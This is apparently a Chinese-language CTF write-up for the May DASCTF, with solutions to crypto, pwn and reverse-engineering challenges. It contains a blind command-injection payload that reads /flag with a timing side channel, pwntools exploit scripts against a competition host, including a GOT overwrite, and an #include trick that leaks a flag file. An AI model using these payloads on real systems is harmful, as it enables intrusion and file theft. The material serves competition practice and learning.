5月DASCTF

帮帮小红吧

命令盲注是我没有想到的

cat /flag |grep 'BJD{' || sleep(3);

密码bbcrypto

题目

# -*- coding:utf-8 -*-
import A,SALT
from itertools import *

def encrypt(m, a, si):
    c=""
    for i in range(len(m)):
        c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2)
    return c
if __name__ == "__main__":
    m = 'flag{********************************}'
    a = A
    salt = SALT
    assert(len(salt)==3)
    assert(salt.isalpha())
    si = cycle(salt.lower())
    print("鏄庢枃鍐呭涓猴細")
    print(m)
    print("鍔犲瘑鍚庣殑瀵嗘枃涓猴細")
    c=encrypt(m, a, si)
    print(c)
    #鍔犲瘑鍚庣殑瀵嗘枃涓猴細
    #177401504b0125272c122743171e2c250a602e3a7c206e014a012703273a3c0160173a73753d

可以看到需要求明文需要知道2个未知数，并且它们与明文的关系是线性的直接上z3爆破即可
大概5秒钟就出来了

from z3 import *
from itertools import *

flag=''
salt="ahh"
si=cycle(salt.lower())
c="\x17t\x01PK\x01%',\x12'C\x17\x1e,%\n`.:| n\x01J\x01'\x03':<\x01`\x17:su="
for i in range(len(c)):
	x=Int('x')
	sol=Solver()
	a=(x*-71+ord(next(si)))%128
	sol.add(x>0)
	sol.add(x<128)
	sol.add(a==ord(c[i]))
	print ord(c[i])
	sol.check()
	flag+=chr(int(str(sol.model())[-4:].replace(']','')))
	print flag

pwn

#!/usr/bin/python2
from pwn import *

#p=process('./Memory_Monster_I')
p=remote('183.129.189.60',10083)
elf=ELF('./Memory_Monster_I')
libc=elf.libc
bin_sh=0x402010
p.sendafter(':',p64(elf.got['__stack_chk_fail'])+'\x00'*0x60)
p.sendafter(':',p64(0x040124A))
p.interactive()

#!/usr/bin/python2
from pwn import *

p=remote('183.129.189.60',10078)
context(arch='amd64',os='linux')
shellcode='''
#include 
char en[]="0ipnf0dug0gmbh";

int main(){
int i;
char buf[40];
FILE *fp;
for(i=0;i<14;i++)
{
  en[i]=en[i]-1;
}
fp=fopen(en,"r");
printf("%s\\n",en);
if(fp==NULL)
printf("nonono");
fgets(buf,40,(FILE*)fp);
printf("%s\\n",buf);
fclose(fp);
 return 0;
}
'''
p.sendafter("@')",shellcode+'@')
p.interactive()

上一个万能的这又是我没想到的

#include "/home/ctf/fl\
ag"@

ViQinere

主要逻辑就很简单

读入flag文件然后判断大写小写数字特殊字符,如果是大写就会-0x41小写就会-0x61(相当于在字母表的位置)然后异或0x7f与一个字符串再取其对应的位置就行了
(这里我直接吧特殊符号和数字给关了反正不影响
exp:

yiq="TaQini"
key2="zyxwvutsrqponmlkjihgfedcba"
v5=0
z=[]
aim=[]
flag="fqd{gfjuj5ublrwjzjpverxkiazzlvo0xta!cwnllasy3b0ievey}"
for i in range(len(flag)):
	a=ord(yiq[v5&5])
	if a>96 and a<=122:
		a=a-97
	elif a<=64 or a>90:
		a=a
	else:
		a=a-0x41
	print hex(a)
	c=ord(flag[i])-97
	print c
	b=((a&0x7f)+c)%26  #c=(b-a&0x7f)
	print b
	aim+=key2[b]
	v5+=1
print aim

输出的全是小写自己在改改就行了)